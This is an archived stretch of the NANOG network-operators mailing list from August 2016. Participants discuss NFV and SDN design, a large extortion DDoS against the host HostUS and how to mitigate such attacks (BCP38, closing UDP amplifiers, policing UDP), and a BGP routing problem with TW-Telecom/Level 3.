In-Reply-To: References: Message-ID: > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built > appliance garbage that can't scale in a cost effective manner and > replacing it with some software solution on 'many' commodity > unix-like-hosts that can scale horizontally.
my main worry about nfv is when they need more forwarding horsepower than the household appliance has, and the data plan is is moved out of the control plane and they are not congruent. we've had too many lessons debugging this situation (datakit, atm, ...). beyond that, i am not sure i see that much difference whether it's a YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, supported communities, ... randy From cb.list6 at gmail.com Wed Aug 3 12:20:36 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 05:20:36 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Wednesday, August 3, 2016, Randy Bush wrote: > > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built > > appliance garbage that can't scale in a cost effective manner and > > replacing it with some software solution on 'many' commodity > > unix-like-hosts that can scale horizontally. > > my main worry about nfv is when they need more forwarding horsepower > than the household appliance has, and the data plan is is moved > out of the control plane and they are not congruent. we've had too many > lessons debugging this situation (datakit, atm, ...). > > YES! This 1,000x. The internet is a very interesting place when viewed from the lens of Automata theory, greedy self optimizing nodes.... very similar to biological systems (including economics). Very robust since each node is greedy and self optimizing in its decision making power. This is a fundamental component of the Internet's success. Some folks talk about sdn controllers and separating control plane and forwarding plane. This breaks the ability for nodes to self optimize and thus undermines a key component of the robustness. It also diverts of the parallels of biological systems. Control and forwarding had been separate on the node for almost 20 years now.
Sdn is like authoritarianism and divine creation rolled up into one and sold at 20% premium to easily duped telco types that want to travel to endless conferences > beyond that, i am not sure i see that much difference whether it's a > YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, > supported communities, ... > > randy > From rwfireguru at gmail.com Wed Aug 3 13:41:57 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 09:41:57 -0400 Subject: Host.us DDOS attack Message-ID: Anyone have any additional info on a DDOS attack hitting host.us? Woke up to no email this morning and the following from their web site: *Following an extortion attempt, HostUS is currently experiencing sustained large-scale DDOS attacks against a number of locations. The attacks were measured in one location at 300Gbps. In another location the attacks temporarily knocked out the entire metropolitan POP for a Tier-1 provider. Please be patient. We will return soon. Your understanding is appreciated. * From my monitoring system, looks like my VPS went unavailable around 23:00 EDT last night. Robert From ahebert at pubnix.net Wed Aug 3 14:16:01 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 10:16:01 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: Message-ID: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Well, Could it be related to the last 2 days DDoS of PokemonGO (which failed) and some other gaming sites (Blizzard and Steam)? And on the subject of CloudFlare, I'm sorry for that CloudFlare person that defended their position earlier this week, but there may be more hints (unverified) against your statements: https://twitter.com/xotehpoodle/status/756850023896322048 That could be explored.
On top of which there is hints (unverified) on which is the real bad actor behind that new DDoS service: http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml And I quote: "One thing LeakedSource staff spotted was that the first payment recorded in the botnet's control panel was of $1, while payments for the same package plan were of $19.99." ( Paypal payments btw ) There is enough information, and damages, imho, to start looking for the people responsible from a legal standpoint. And hopefully the proper authorities are interested. PS: I will like to take this time to underline the lack of participation from a vast majority of ISPs into BCP38 and the like. We need to keep educating them at every occasion we have. For those that actually implemented some sort of tech against it, you are a beacon of hope in what is a ridiculous situation that has been happening for more than 15 years. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/03/16 09:41, Robert Webb wrote: > Anyone have any additonal info on a DDOS attack hitting host.us? > > Woke up to no email this morning and the following from their web site: > > > > *Following an extortion attempt, HostUS is currently experiencing sustained > large-scale DDOS attacks against a number of locations. The attacks were > measured in one location at 300Gbps. In another location the attacks > temporarily knocked out the entire metropolitan POP for a Tier-1 provider. > Please be patient. We will return soon. Your understanding is appreciated. > * > > > >From my monitoring system, looks like my VPS went unavailable around 23:00 > EDT last night. 
> > Robert > From rwfireguru at gmail.com Wed Aug 3 14:25:33 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 10:25:33 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Not sure if it is related to the PokemonGO or not. This started around 23:00 EDT last night per my monitoring. Seems like a pretty big attack at 300Gbps and to also temporarily take a down a Tier 1 POP in a major city. I was interested as to if this might be a botnet or some type of reflection attack. Robert On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99." > > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. 
> > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > ----- > Alain Hebert ahebert at pubnix.net > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. > > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. > > > > Robert > > > > From morrowc.lists at gmail.com Wed Aug 3 14:27:57 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 10:27:57 -0400 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: On Wed, Aug 3, 2016 at 8:20 AM, Ca By wrote: > > > On Wednesday, August 3, 2016, Randy Bush wrote: > >> > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built >> > appliance garbage that can't scale in a cost effective manner and >> > replacing it with some software solution on 'many' commodity >> > unix-like-hosts that can scale horizontally. 
>> >> my main worry about nfv is when they need more forwarding horsepower >> than the household appliance has, and the data plan is is moved >> > this is a scaling problem, and one which points to the need to not do 'all of one thing' ('all nfv will solve us!') you may still need other methods to load balance or deal with loads which are higher than the nfv platform(s) can deal with properly. In some sense this is the same problem as trying to push too many pps through a linecard which you know has a limit lower than line-rate. > out of the control plane and they are not congruent. we've had too many >> lessons debugging this situation (datakit, atm, ...). >> >> seperation of data/control plane ... does require knowledge about what you are doing and has clear implications on toolling, troubleshooting, etc. To some extent this mirrors anycast dns deployment problems. "I made a much more complex system, though from the outside perhaps it doesn't appear any different." be prepared for interesting times. > Sdn is like authoritarianism and divine creation rolled up into one and > sold at 20% premium to easily duped telco types that want to travel to > endless conferences > > Sure, you have to know what you are doing/buying... magic doesn't exist in this space. > > >> beyond that, i am not sure i see that much difference whether it's a >> YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, >> supported communities, ... >> >> randy >> > From rwfireguru at gmail.com Wed Aug 3 14:28:54 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 10:28:54 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Apologies to all as the hostname in my subject is incorrect. It should be hostus.us... On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: > Not sure if it is related to the PokemonGO or not. 
This started around > 23:00 EDT last night per my monitoring. > > Seems like a pretty big attack at 300Gbps and to also temporarily take a > down a Tier 1 POP in a major city. > > I was interested as to if this might be a botnet or some type of > reflection attack. > > > Robert > > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert wrote: > >> Well, >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> person that defended their position earlier this week, but there may be >> more hints (unverified) against your statements: >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> That could be explored. >> >> >> On top of which there is hints (unverified) on which is the real bad >> actor behind that new DDoS service: >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> And I quote: >> >> "One thing LeakedSource staff spotted was that the first payment >> recorded in the botnet's control panel was of $1, while payments for the >> same package plan were of $19.99." >> >> ( Paypal payments btw ) >> >> >> There is enough information, and damages, imho, to start looking for >> the people responsible from a legal standpoint. And hopefully the >> proper authorities are interested. >> >> PS: >> >> I will like to take this time to underline the lack of >> participation from a vast majority of ISPs into BCP38 and the like. We >> need to keep educating them at every occasion we have. >> >> For those that actually implemented some sort of tech against >> it, you are a beacon of hope in what is a ridiculous situation that has >> been happening for more than 15 years. >> >> ----- >> Alain Hebert ahebert at pubnix.net >> PubNIX Inc. >> 50 boul. St-Charles >> P.O. 
Box 26770 Beaconsfield, Quebec H9W 6G7 >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> On 08/03/16 09:41, Robert Webb wrote: >> > Anyone have any additonal info on a DDOS attack hitting host.us? >> > >> > Woke up to no email this morning and the following from their web site: >> > >> > >> > >> > *Following an extortion attempt, HostUS is currently experiencing >> sustained >> > large-scale DDOS attacks against a number of locations. The attacks were >> > measured in one location at 300Gbps. In another location the attacks >> > temporarily knocked out the entire metropolitan POP for a Tier-1 >> provider. >> > Please be patient. We will return soon. Your understanding is >> appreciated. >> > * >> > >> > >> > >From my monitoring system, looks like my VPS went unavailable around >> 23:00 >> > EDT last night. >> > >> > Robert >> > >> >> > From swm at emanon.com Wed Aug 3 14:32:33 2016 From: swm at emanon.com (Scott Morris) Date: Wed, 3 Aug 2016 10:32:33 -0400 Subject: Clueful BGP from TW-Telecom/L3 In-Reply-To: References: Message-ID: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com> Yeah, considering that I STILL haven't managed to get anyone in their supposed "Tier 3" group to call back on the open case is just completely baffling to me. And with the Level 3 side, I've tried all sorts of different communities they supposedly use only to find that other policies override how those are treated along the way. I just don't understand how customer support can be such a difficult thing. Scott From: Micah Croff Date: Tuesday, July 26, 2016 at 6:21 PM To: Scott Morris Cc: "nanog at nanog.org" Subject: Re: Clueful BGP from TW-Telecom/L3 Last I dealt with TW Telecom and BGP we had to explain to them that putting in a static route on both routers on top of BGP was not desired. Then they reconfigured a circuit 30 miles away when trying to turn it up again causing an outage in our data center. Sorry, not super hopeful when it comes to TW Telecom.
Micah On Mon, Jul 25, 2016 at 8:51 PM, Scott Morris wrote: Is there per chance anyone hanging on here who is clueful about BGP working with TW-Telecom and the recent integration with Level3??? I have a client that I consult with whose route is not getting sent from TW to L3 and the techs on the case are convinced we need to put different BGP communities in (both to TW link and other provider link) which of course we are putting in to satisfy them, but magically it is not working. This SHOULD be an easy thing to figure out using the Looking Glass servers within both TW and Level3, but this concept is lost on techs we are dealing with. Anyone internal there who can contact me off-list would be greatly appreciated! Scott swm at emanon.com From cb.list6 at gmail.com Wed Aug 3 14:36:09 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 07:36:09 -0700 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > > Could it be related to the last 2 days DDoS of PokemonGO (which > failed) and some other gaming sites (Blizzard and Steam)? > > > And on the subject of CloudFlare, I'm sorry for that CloudFlare > person that defended their position earlier this week, but there may be > more hints (unverified) against your statements: > > https://twitter.com/xotehpoodle/status/756850023896322048 > > That could be explored. > > > On top of which there is hints (unverified) on which is the real bad > actor behind that new DDoS service: > > > > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > > And I quote: > > "One thing LeakedSource staff spotted was that the first payment > recorded in the botnet's control panel was of $1, while payments for the > same package plan were of $19.99."
> > ( Paypal payments btw ) > > > There is enough information, and damages, imho, to start looking for > the people responsible from a legal standpoint. And hopefully the > proper authorities are interested. > > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. > > Bcp38 is not the issue. It is only the trigger, and as long as one network in Elbonia allows spoofs, that one network can marshall 100s of gbs of ddos power. Years of telling people to do bcp38 has not worked. The issue is for you and your neighbor to turn off your reflecting udp amplifiers (open dns relay, ssdp, ntp, chargen) and generously block obvious ddos traffic. A healthy udp policer is also smart. I suggest taking a baseline of your normal peak udp traffic, and build a policer that drops all udp that is 10x the baseline for bw and pps. Bcp38 is good, but it is not the solution we need to tactically stop attacks. This is not pretty. But it works at keeping your network up. CB ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 09:41, Robert Webb wrote: > > Anyone have any additonal info on a DDOS attack hitting host.us? > > > > Woke up to no email this morning and the following from their web site: > > > > > > > > *Following an extortion attempt, HostUS is currently experiencing > sustained > > large-scale DDOS attacks against a number of locations. The attacks were > > measured in one location at 300Gbps. In another location the attacks > > temporarily knocked out the entire metropolitan POP for a Tier-1 > provider. 
> > Please be patient. We will return soon. Your understanding is > appreciated. > > * > > > > > > >From my monitoring system, looks like my VPS went unavailable around > 23:00 > > EDT last night. > > > > Robert > > > > From jwbensley at gmail.com Wed Aug 3 14:40:17 2016 From: jwbensley at gmail.com (James Bensley) Date: Wed, 3 Aug 2016 15:40:17 +0100 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On 3 August 2016 at 15:16, Alain Hebert wrote: > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. At the risk of starting a "NANOG war" [1], BCP isn't a magic wand. If I find a zero day in the nasty customised kernels that OVH run on their clients boxes, I only need 300 compromised hosts to send 300Gbps of traffic without spoofing the IP or using amplification attacks [2]. I can rent a server with a 10Gbps connection for 1 hour for a few quid/dollars. I could generate hundreds of Gbps of traffic for about ?1000 from legitimate IPs, paid for with stolen card details. How will BCP save you then? Can everyone stop praising it like it was a some magic bullet? James. [1] A pathetic and futile one, so different from the rest. [2] Subsitute OVH for any half decent provider that isn't really oversubscribed. 
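The UDP policer Ca By proposes earlier in this thread (baseline the normal peak UDP load, then drop UDP beyond 10x that baseline in bandwidth and in packets per second), sketched as an added example that is not part of any list post. The token-bucket mechanism, the 100 ms burst allowance, all function names and the sample baseline figures are assumptions made for the illustration.

```python
"""UDP policer sized from a traffic baseline: limit = 10x normal peak, in bps and pps."""

MULTIPLIER = 10  # "10x the baseline", the figure given in the message

# Constructed samples of normal UDP load per interval: (bits/s, packets/s).
BASELINE_SAMPLES = [
    (40_000_000, 9_000),
    (55_000_000, 12_000),
    (80_000_000, 15_000),  # bandwidth peak
    (62_000_000, 20_000),  # packet-rate peak
]


def policer_limits(samples, multiplier=MULTIPLIER):
    """Return (limit_bps, limit_pps): each normal peak times the multiplier."""
    peak_bps = max(bps for bps, _ in samples)
    peak_pps = max(pps for _, pps in samples)
    return peak_bps * multiplier, peak_pps * multiplier


class TokenBucket:
    """Classic token bucket: refills at `rate` per second, holds at most `burst`."""

    def __init__(self, rate, burst):
        self.rate = rate
        self.burst = burst
        self.tokens = burst  # start full
        self.last = 0.0

    def refill(self, now):
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now


class UdpPolicer:
    """Forward a UDP packet only if both the bit bucket and the packet bucket can pay."""

    def __init__(self, limit_bps, limit_pps, burst_seconds=0.1):
        # burst_seconds is an assumption; the message does not give a burst size.
        self.bits = TokenBucket(limit_bps, limit_bps * burst_seconds)
        self.pkts = TokenBucket(limit_pps, limit_pps * burst_seconds)

    def allow(self, now, size_bytes):
        self.bits.refill(now)
        self.pkts.refill(now)
        need_bits = size_bytes * 8
        if self.bits.tokens >= need_bits and self.pkts.tokens >= 1:
            self.bits.tokens -= need_bits
            self.pkts.tokens -= 1
            return True
        return False  # above 10x baseline in bps or in pps: drop


def offer(pps, size_bytes, seconds=1.0):
    """Offer a constant-rate UDP flow to a fresh policer; return (forwarded, dropped)."""
    policer = UdpPolicer(*policer_limits(BASELINE_SAMPLES))
    total = int(pps * seconds)
    forwarded = sum(policer.allow(i / pps, size_bytes) for i in range(total))
    return forwarded, total - forwarded


if __name__ == "__main__":
    print("limits (bps, pps):", policer_limits(BASELINE_SAMPLES))
    for label, pps, size in [
        ("normal peak", 20_000, 500),            # 80 Mbit/s, untouched
        ("large-packet flood", 500_000, 1400),   # 5.6 Gbit/s, capped by the bps bucket
        ("small-packet flood", 500_000, 64),     # 256 Mbit/s, capped by the pps bucket
    ]:
        fwd, drop = offer(pps, size)
        print(f"{label:20s} forwarded={fwd:7d} dropped={drop:7d}")
```

The small-packet case stays under the bandwidth limit and is caught only by the packet-rate bucket, which is why the message asks for both. Once a limit is exceeded the policer cannot tell legitimate UDP from attack UDP, so both are dropped while other traffic stays up.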
From ahebert at pubnix.net Wed Aug 3 14:53:22 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 10:53:22 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Well, I'm sorry. That sound like the CloudFlare argument: You cannot fix the DDoSs at the source because Elbonia can do it. The only solution is to pay for protection. Between you and me, if only Elbonia are left DDoSing at 100Gbps, we simply de-peer the commercial subnets from that country (leaving the govt subnets up obviously) and see for them to deal with their trash ISPs once for all. ( That's how we used to do it early on when the IIRC flooding started ). Or we keep getting DDoSed for the next 100+ years. PS: Yes, the fictional country from the Dilbert syndicated cartoons. On a humorous note: The DDoS protection lobby is our NRA. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/03/16 10:36, Ca By wrote: > On Wednesday, August 3, 2016, Alain Hebert wrote: > >> Well, >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> person that defended their position earlier this week, but there may be >> more hints (unverified) against your statements: >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> That could be explored. 
>> >> >> On top of which there is hints (unverified) on which is the real bad >> actor behind that new DDoS service: >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> And I quote: >> >> "One thing LeakedSource staff spotted was that the first payment >> recorded in the botnet's control panel was of $1, while payments for the >> same package plan were of $19.99." >> >> ( Paypal payments btw ) >> >> >> There is enough information, and damages, imho, to start looking for >> the people responsible from a legal standpoint. And hopefully the >> proper authorities are interested. >> >> PS: >> >> I will like to take this time to underline the lack of >> participation from a vast majority of ISPs into BCP38 and the like. We >> need to keep educating them at every occasion we have. >> >> For those that actually implemented some sort of tech against >> it, you are a beacon of hope in what is a ridiculous situation that has >> been happening for more than 15 years. >> >> > Bcp38 is not the issue. It is only the trigger, and as long as one network > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > ddos power. Years of telling people to do bcp38 has not worked. > > The issue is for you and your neighbor to turn off your reflecting udp > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > obvious ddos traffic. A healthy udp policer is also smart. I suggest > taking a baseline of your normal peak udp traffic, and build a policer that > drops all udp that is 10x the baseline for bw and pps. > > Bcp38 is good, but it is not the solution we need to tactically stop > attacks. > > This is not pretty. But it works at keeping your network up. > > CB > > > ----- >> Alain Hebert ahebert at pubnix.net >> >> PubNIX Inc. >> 50 boul. St-Charles >> P.O. 
Box 26770 Beaconsfield, Quebec H9W 6G7 >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> On 08/03/16 09:41, Robert Webb wrote: >>> Anyone have any additonal info on a DDOS attack hitting host.us? >>> >>> Woke up to no email this morning and the following from their web site: >>> >>> >>> >>> *Following an extortion attempt, HostUS is currently experiencing >> sustained >>> large-scale DDOS attacks against a number of locations. The attacks were >>> measured in one location at 300Gbps. In another location the attacks >>> temporarily knocked out the entire metropolitan POP for a Tier-1 >> provider. >>> Please be patient. We will return soon. Your understanding is >> appreciated. >>> * >>> >>> >>> >From my monitoring system, looks like my VPS went unavailable around >> 23:00 >>> EDT last night. >>> >>> Robert >>> >> From morrowc.lists at gmail.com Wed Aug 3 14:58:33 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 10:58:33 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: On Wed, Aug 3, 2016 at 10:40 AM, James Bensley wrote: > How will > BCP save you then? Can everyone stop praising it like it was a some > magic bullet? > aren't you making a 'perfect is the enemy of good' argument here? 'seatbelts don't solve all car crash deaths, so let's just go mad-max!' From cb.list6 at gmail.com Wed Aug 3 15:05:04 2016 From: cb.list6 at gmail.com (Ca By) Date: Wed, 3 Aug 2016 08:05:04 -0700 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Message-ID: On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > I'm sorry. > > That sound like the CloudFlare argument: You cannot fix the DDoSs > at the source because Elbonia can do it. 
The only solution is to pay > for protection. > > No. I hate the idea of paying for protection from a cloud or appliance. Elbonia just has the trigger. The loaded gun is the ddos reflector in comcast, cox, vz, and everyone else. > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) and see for them to deal with their trash > ISPs once for all. ( That's how we used to do it early on when the IIRC > flooding started ). > > There are known problematic networks. I have not seen any of them or their facilitating upstreams depeered. I can name 4 networks that source 75% of my attack attack traffic. Comcast was one due to their ssdp reflection, they stopped that now. But still lots of dns attacks from them. Or we keep getting DDoSed for the next 100+ years. > > On that track. > PS: Yes, the fictional country from the Dilbert syndicated cartoons. > > > Swap in your favorite real world country / network that has very real abuse source reputation. > On a humorous note: > > The DDoS protection lobby is our NRA. > > ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 10:36, Ca By wrote: > > On Wednesday, August 3, 2016, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. 
> >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> > > Bcp38 is not the issue. It is only the trigger, and as long as one > network > > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > > ddos power. Years of telling people to do bcp38 has not worked. > > > > The issue is for you and your neighbor to turn off your reflecting udp > > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > > obvious ddos traffic. A healthy udp policer is also smart. I suggest > > taking a baseline of your normal peak udp traffic, and build a policer > that > > drops all udp that is 10x the baseline for bw and pps. > > > > Bcp38 is good, but it is not the solution we need to tactically stop > > attacks. > > > > This is not pretty. But it works at keeping your network up. > > > > CB > > > > > > ----- > >> Alain Hebert ahebert at pubnix.net > > >> > >> PubNIX Inc. > >> 50 boul. 
St-Charles > >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> > >> On 08/03/16 09:41, Robert Webb wrote: > >>> Anyone have any additonal info on a DDOS attack hitting host.us? > >>> > >>> Woke up to no email this morning and the following from their web site: > >>> > >>> > >>> > >>> *Following an extortion attempt, HostUS is currently experiencing > >> sustained > >>> large-scale DDOS attacks against a number of locations. The attacks > were > >>> measured in one location at 300Gbps. In another location the attacks > >>> temporarily knocked out the entire metropolitan POP for a Tier-1 > >> provider. > >>> Please be patient. We will return soon. Your understanding is > >> appreciated. > >>> * > >>> > >>> > >>> >From my monitoring system, looks like my VPS went unavailable around > >> 23:00 > >>> EDT last night. > >>> > >>> Robert > >>> > >> > > From ahebert at pubnix.net Wed Aug 3 15:06:29 2016 From: ahebert at pubnix.net (Alain Hebert) Date: Wed, 3 Aug 2016 11:06:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Well, I didn't want to pollute nanog list with my BCP38 (or other solutions) ranting, but come on: [1] How can insuring source IP's, coming out your network, are part of your advertised subnets pathetic and futile? Don't you think if the source ip are traceable back to OVH actually, it would be easy for OVH to see and deal with it, instead of noises with random source IP coming from the bunch of un-patched residential routers in Latin America's (for example)? And we're back on track with "do nothing but pay for protection" as the only solution. Gotta love Humans. ----- Alain Hebert ahebert at pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. 
Box 26770 Beaconsfield, Quebec H9W 6G7
Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443

On 08/03/16 10:40, James Bensley wrote:
> On 3 August 2016 at 15:16, Alain Hebert wrote:
>> PS:
>>
>> I will like to take this time to underline the lack of
>> participation from a vast majority of ISPs into BCP38 and the like. We
>> need to keep educating them at every occasion we have.
>>
>> For those that actually implemented some sort of tech against
>> it, you are a beacon of hope in what is a ridiculous situation that has
>> been happening for more than 15 years.
>
> At the risk of starting a "NANOG war" [1], BCP isn't a magic wand.
>
> If I find a zero day in the nasty customised kernels that OVH run on
> their clients boxes, I only need 300 compromised hosts to send 300Gbps
> of traffic without spoofing the IP or using amplification attacks [2].
>
> I can rent a server with a 10Gbps connection for 1 hour for a few
> quid/dollars. I could generate hundreds of Gbps of traffic for about
> £1000 from legitimate IPs, paid for with stolen card details. How will
> BCP save you then? Can everyone stop praising it like it was a some
> magic bullet?
>
> James.
>
>
> [1] A pathetic and futile one, so different from the rest.
>
> [2] Substitute OVH for any half decent provider that isn't really oversubscribed.
>

From nanog at ics-il.net Wed Aug 3 15:09:07 2016
From: nanog at ics-il.net (Mike Hammett)
Date: Wed, 3 Aug 2016 10:09:07 -0500 (CDT)
Subject: Host.us DDOS attack -and- related conversations
In-Reply-To:
References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net>
Message-ID: <1302086702.14567.1470236945871.JavaMail.mhammett@ThunderFuck>

Doing BCP38 or blocking\shutting off known amplification vectors both require effort and both accomplish the same thing. Of course doing both is best. :-)

One provider in "Elbonia" getting through is far more damaging to that provider in Elbonia than the rest of the world, if they were the only ones left.
